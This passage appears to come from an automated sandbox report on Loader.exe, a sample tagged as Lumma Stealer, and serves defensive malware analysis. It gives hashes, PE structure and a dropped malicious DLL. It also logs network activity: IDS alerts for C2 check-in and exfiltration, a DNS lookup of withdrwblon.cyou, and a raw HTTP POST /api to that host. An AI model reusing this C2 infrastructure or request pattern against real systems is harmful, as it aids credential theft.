                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                StudioDemo.exeGet hashmaliciousLummaCBrowse
                                                                • 188.114.96.3
                                                                No context
                                                                Process:C:\Users\user\Desktop\Loader.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):42
                                                                Entropy (8bit):4.0050635535766075
                                                                Encrypted:false
                                                                SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                Process:C:\Users\user\Desktop\Loader.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):618496
                                                                Entropy (8bit):7.162338420980197
                                                                Encrypted:false
                                                                SSDEEP:12288:NaQC2TRw8o1IKPB2EbEPA99drekfl/EUGygoOV+uyJdaIKqL1hI51M:82TRI1XB2EbEo9/XflyXonuyKqL1hQ
                                                                MD5:39BDA6BBB72A50BAA2DD3D3D6D55F17C
                                                                SHA1:A3C63FB05A5A95520DA960540117EC128D3C86E4
                                                                SHA-256:C95872DC3154D8688CE3EE0D4AA080C62012512A132C92E03DB54C09E16891ED
                                                                SHA-512:DC56DADE50BDA2E3492781BEAFE83C8BFA861B7641CF8FFE2026FB55422578578AB22B754D5E6C3542763AAC220285A508FB530C62CEC6AAC9D29663402BD79C
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.vkp}.8p}.8p}.8;..9|}.8;..9.}.8;..9d}.8;..9v}.8W.c8s}.8p}.8.}.8v..9Q}.8v..9`}.8v..9d}.8p}.8q}.8...9q}.8...9q}.8Richp}.8........................PE..L......g...........!...&..................................................................@..........................*..x....*..d................................ ..................................@...@...............t............................text.............................. ..`.rdata..ns.......t..................@..@.data....8...@...*...$..............@....reloc... ......."...N..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.9056926013279805
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:Loader.exe
                                                                File size:392'704 bytes
                                                                MD5:c92baaa9c4217759880a0ff0904695d9
                                                                SHA1:3902c5a7a6e557ab736d2b0e65c55f3f8b5a7b7b
                                                                SHA256:c72d1af1710785874f9c4bb686c4b7dfb89de050fb2c189898432247d8cfe386
                                                                SHA512:2aa03461c0af47483095ed2c0f932e7af287e853f7998de6c92ee56c396da26abae066b467dbf6d150d21b7070fc85d1950bcced8e58c214385840f863729d37
                                                                SSDEEP:6144:3boZRRYEmBhcU306dd4AvwdSaqRMNDADW8s6nVP5cQhuQWZjyZFfkz:LWRR00U3Tdd44eSQtg7nVP5nhi+Hfkz
                                                                TLSH:CB84DF9CB66432DFC953D0B29EA82C74FA5078BA972F4203D427069EDA4D987DF540F2
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.....................h.......`....... ....@.. ....................................@................................
                                                                Icon Hash:00928e8e8686b000
                                                                Entrypoint:0x46600a
                                                                Entrypoint Section:
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows cui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6718B38B [Wed Oct 23 08:27:55 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                Instruction
                                                                jmp dword ptr [00466000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x588340x57.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x620000x6f8.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x640000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x660000x8
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x580000x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                nS50x20000x55d480x55e00f0f0a5771c9a2d0c4beb38abc7ed88d4False1.0003297852983988data7.99947521126159IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .text0x580000x8ed80x90008388af038404591af5ff0f5401a38eb5False0.389404296875data4.732665844945101IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rsrc0x620000x6f80x800374c8d5fc55ccf3a5ff0130edd132b53False0.396484375data3.7864731116706225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x640000xc0x200870a6a7b9c703b02b1e807ec0b5e7833False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                0x660000x100x2000777db21f14a5d390fb883739ea01888False0.044921875data0.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_VERSION0x620a00x46cdata0.450530035335689
                                                                RT_MANIFEST0x6250c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                DLLImport
                                                                mscoree.dll_CorExeMain
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-24T21:51:08.218465+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749699188.114.96.3443TCP
                                                                2024-10-24T21:51:08.218465+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749699188.114.96.3443TCP
                                                                2024-10-24T21:51:09.491651+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749700188.114.96.3443TCP
                                                                2024-10-24T21:51:09.491651+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749700188.114.96.3443TCP
                                                                2024-10-24T21:51:17.453106+02002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749720188.114.96.3443TCP
                                                                2024-10-24T21:51:20.582900+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749736188.114.96.3443TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 24, 2024 21:51:06.944626093 CEST49699443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:06.944681883 CEST44349699188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:06.944760084 CEST49699443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:06.947922945 CEST49699443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:06.947938919 CEST44349699188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:07.608620882 CEST44349699188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:07.608705997 CEST49699443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:07.618401051 CEST49699443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:07.618408918 CEST44349699188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:07.618783951 CEST44349699188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:07.667485952 CEST49699443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:07.704693079 CEST49699443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:07.704746962 CEST49699443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:07.704967022 CEST44349699188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:08.218502998 CEST44349699188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:08.218729019 CEST44349699188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:08.218874931 CEST49699443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:08.221112967 CEST49699443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:08.221141100 CEST44349699188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:08.384480953 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:08.384529114 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:08.384625912 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:08.385185003 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:08.385220051 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.036091089 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.036173105 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.038120031 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.038130045 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.038455009 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.040143967 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.040179968 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.040227890 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.491661072 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.491709948 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.491750956 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.491781950 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.491785049 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.491801977 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.491836071 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.492105007 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.492135048 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.492161036 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.492182970 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.492188931 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.492257118 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.492264032 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.492418051 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.493218899 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.542471886 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.608613968 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.608722925 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.608757973 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.608799934 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.608819008 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.608851910 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.608885050 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.608913898 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.609110117 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.609119892 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.609141111 CEST49700443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.609146118 CEST44349700188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.743797064 CEST49701443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.743851900 CEST44349701188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:09.744123936 CEST49701443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.744323015 CEST49701443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:09.744343042 CEST44349701188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:10.639691114 CEST44349701188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:10.639906883 CEST49701443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:10.641679049 CEST49701443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:10.641691923 CEST44349701188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:10.641954899 CEST44349701188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:10.643274069 CEST49701443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:10.643430948 CEST49701443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:10.643457890 CEST44349701188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:11.257366896 CEST44349701188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:11.257452965 CEST44349701188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:11.257683992 CEST49701443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:11.258265018 CEST49701443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:11.466835976 CEST49702443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:11.466885090 CEST44349702188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:11.467008114 CEST49702443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:11.467494965 CEST49702443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:11.467510939 CEST44349702188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:12.463449955 CEST44349702188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:12.463641882 CEST49702443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:12.464939117 CEST49702443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:12.464953899 CEST44349702188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:12.465325117 CEST44349702188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:12.466877937 CEST49702443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:12.467006922 CEST49702443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:12.467041016 CEST44349702188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:12.467118025 CEST49702443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:12.467125893 CEST44349702188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:13.137640953 CEST44349702188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:13.137885094 CEST44349702188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:13.137973070 CEST49702443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:13.138036966 CEST49702443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:13.138050079 CEST44349702188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:13.638993025 CEST49709443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:13.639044046 CEST44349709188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:13.639143944 CEST49709443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:13.639662981 CEST49709443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:13.639678955 CEST44349709188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:14.682254076 CEST44349709188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:14.682435036 CEST49709443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:14.696675062 CEST49709443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:14.696696043 CEST44349709188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:14.697074890 CEST44349709188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:14.698673010 CEST49709443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:14.698673010 CEST49709443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:14.698729038 CEST44349709188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:14.698812008 CEST49709443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:14.698822975 CEST44349709188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:15.553002119 CEST44349709188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:15.553113937 CEST44349709188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:15.553211927 CEST49709443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:15.568645000 CEST49709443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:15.568665981 CEST44349709188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:16.331480980 CEST49720443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:16.331572056 CEST44349720188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:16.331650972 CEST49720443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:16.332000971 CEST49720443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:16.332037926 CEST44349720188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:16.953174114 CEST44349720188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:16.953404903 CEST49720443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:16.954744101 CEST49720443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:16.954761028 CEST44349720188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:16.955094099 CEST44349720188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:16.956476927 CEST49720443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:16.956578016 CEST49720443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:16.956587076 CEST44349720188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:17.453068018 CEST44349720188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:17.453181028 CEST44349720188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:17.453244925 CEST49720443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:17.453551054 CEST49720443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:17.453593016 CEST44349720188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:17.668705940 CEST49728443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:17.668751001 CEST44349728188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:17.668823957 CEST49728443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:17.669146061 CEST49728443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:17.669156075 CEST44349728188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:18.688973904 CEST44349728188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:18.689042091 CEST49728443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:18.774770021 CEST49728443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:18.774812937 CEST44349728188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:18.775293112 CEST44349728188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:18.781569958 CEST49728443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:18.781776905 CEST49728443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:18.781785011 CEST44349728188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:19.394535065 CEST44349728188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:19.394651890 CEST44349728188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:19.394767046 CEST49728443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:19.394826889 CEST49728443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:19.394848108 CEST44349728188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:19.447494984 CEST49736443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:19.447530985 CEST44349736188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:19.447603941 CEST49736443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:19.447860956 CEST49736443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:19.447873116 CEST44349736188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:20.102818966 CEST44349736188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:20.102941990 CEST49736443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:20.104074955 CEST49736443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:20.104085922 CEST44349736188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:20.104310036 CEST44349736188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:20.105897903 CEST49736443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:20.105897903 CEST49736443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:20.105978966 CEST44349736188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:20.582901001 CEST44349736188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:20.583004951 CEST44349736188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:20.583056927 CEST49736443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:20.583256006 CEST49736443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:20.583256006 CEST49736443192.168.2.7188.114.96.3
                                                                Oct 24, 2024 21:51:20.583267927 CEST44349736188.114.96.3192.168.2.7
                                                                Oct 24, 2024 21:51:20.583276033 CEST44349736188.114.96.3192.168.2.7
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 24, 2024 21:51:06.900010109 CEST6344953192.168.2.71.1.1.1
                                                                Oct 24, 2024 21:51:06.938548088 CEST53634491.1.1.1192.168.2.7
                                                                Oct 24, 2024 21:51:44.269059896 CEST5353613162.159.36.2192.168.2.7
                                                                Oct 24, 2024 21:51:44.888098955 CEST5928953192.168.2.71.1.1.1
                                                                Oct 24, 2024 21:51:44.897464991 CEST53592891.1.1.1192.168.2.7
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 24, 2024 21:51:06.900010109 CEST192.168.2.71.1.1.10xcd16Standard query (0)withdrwblon.cyouA (IP address)IN (0x0001)false
                                                                Oct 24, 2024 21:51:44.888098955 CEST192.168.2.71.1.1.10x75d6Standard query (0)171.39.242.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 24, 2024 21:51:06.938548088 CEST1.1.1.1192.168.2.70xcd16No error (0)withdrwblon.cyou188.114.96.3A (IP address)IN (0x0001)false
                                                                Oct 24, 2024 21:51:06.938548088 CEST1.1.1.1192.168.2.70xcd16No error (0)withdrwblon.cyou188.114.97.3A (IP address)IN (0x0001)false
                                                                Oct 24, 2024 21:51:44.897464991 CEST1.1.1.1192.168.2.70x75d6Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                • withdrwblon.cyou
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.749699188.114.96.34437388C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 19:51:07 UTC263OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: withdrwblon.cyou
                                                                2024-10-24 19:51:07 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-10-24 19:51:08 UTC1007INHTTP/1.1 200 OK
